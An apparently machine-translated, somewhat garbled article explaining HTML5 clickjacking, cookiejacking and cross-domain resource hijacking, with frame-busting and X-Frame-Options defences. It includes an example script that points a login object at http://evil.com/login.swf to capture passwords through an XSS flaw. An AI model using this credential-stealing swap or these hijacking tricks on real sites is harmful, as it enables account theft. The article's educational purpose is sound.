HTML5 Security Risk Analysis: Hijacking attack

In this paper, we want to talk about a kind of HTML5 security problem, that is, hijacking problem.

Here we want to talk about a kind of HTML5 security problem, that is, hijacking problem.

First, clickjacking-click Hijack

This type of attack is becoming more and more common. The attacked page as an IFRAME, the mask is set to transparent on the upper layer, malicious code secretly placed in the back of the page, making a page appears to be safe, and then trick the user to click on the content on the page, to steal user information or hijack the user's operation. , the fraudulent page is placed on the lower level, the attacked Bank page is placed on top of the transparent layer, the user sees the information displayed on the fraudulent page and enters and clicks, but the real user behavior occurs on the Bank page.

Imagine that clicking Hijack can induce you to post a bogus microblog, or send a fake email or even steal your personal information. For example, you can entice us to post a bogus Twitter message.

Here is a test tool clickjacktest can detect whether your page has the risk of click Hijacking, you can enter a URL and click on test, if the page can be displayed and load, then there is the risk of a click Hijacking attack on this page, if the page is displayed as a blank, That means the page is more secure.

Second, Cookiejacking-cookie hijacking

Clickjacking only involves clicking, but HTML5 's drag-and-drop API allows this attack to be extended to drag-and-drop operations. Because there are a lot of things in the Web application that need to be dragged and dropped by the user. In the same-origin policy, a domain's cookie can only be accessed by the domain, but the drag-and-drop operation is not restricted by the same-origin policy, which enables the use of drag-and-drop operations, XSS, and other techniques to construct cross-domain legitimate requests and hijack cookies.

Drag and drop cookies from one domain to another

The implementation of the principle is similar to clickjacking, as long as the user to deceive the drag-and-drop behavior, you can send the user a domain information to another domain. This is really easy to do, and a researcher has built an app on Facebook that lets users drag and drop pictures of beautiful women. I think most people would try and not be wary.

A little game to trick and drop

How should we prevent clickjacking and cookiejacking?

1, x-frame-options: All modern browsers support X-frame-options HTTP header, this header allows the page to be used by the IFRAME if the normal rendering. The page in is the effect when x-frame-options is in effect.

2. JavaScript mode

This is a very common approach, and the code is as follows:

1. 01.if (Top!==window)
2. top.location = window.location.href;

Both Facebook and Twitter use this approach, but this approach is not entirely effective, such as an attacker can bypass (for example, an IFRAME sandbox) with 204 turns or disables JavaScript.

However, at least 80% of the sites are now not aware of the issue of click Hijacking and cookie hijacking and are protected. The main purpose of my article is to remind you of this covert attack pattern and targeted defense.

Three, corjacking-cross-domain resource hijacking

Corjacking refers to cross-origin resource hijacking. HTML5 applications have a variety of resources, such as flash files, Silverligh, video, audio, etc., which can be accessed and controlled through the DOM. If an XSS vulnerability exists on the page, an attacker could exploit the hijacking of a cross-domain resource. For example, the following code loads a SWF file as a user login box, in which we can implement some cryptographic logic.

2. <object classid= "clsid:xxxxxxx-xxxx-xxxx-xxxxxx" id= "Login" width= "100%" height= "100 % " codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab>
4. <param name= "movie"value= "login.swf" />
6. <param name= "quality"value= " High"/>
8. <embed src= "login.swf"quality= "High" width= "50%" height= "50%">
10. </Object>

When an XSS vulnerability exists on a page, an attacker could use the following script to replace the SWF file with a fraudulent false resource.

1. Document.getelementbyname (' Login '). Item (0). src= ' http://evil.com/login.swf ';

Then when the user enters his username and password in such a login box and logs in, his account is stolen.

This problem is inconsistent in different browsers, and interested friends can go down to test themselves.

HTML5 Security Risk Analysis: Hijacking attack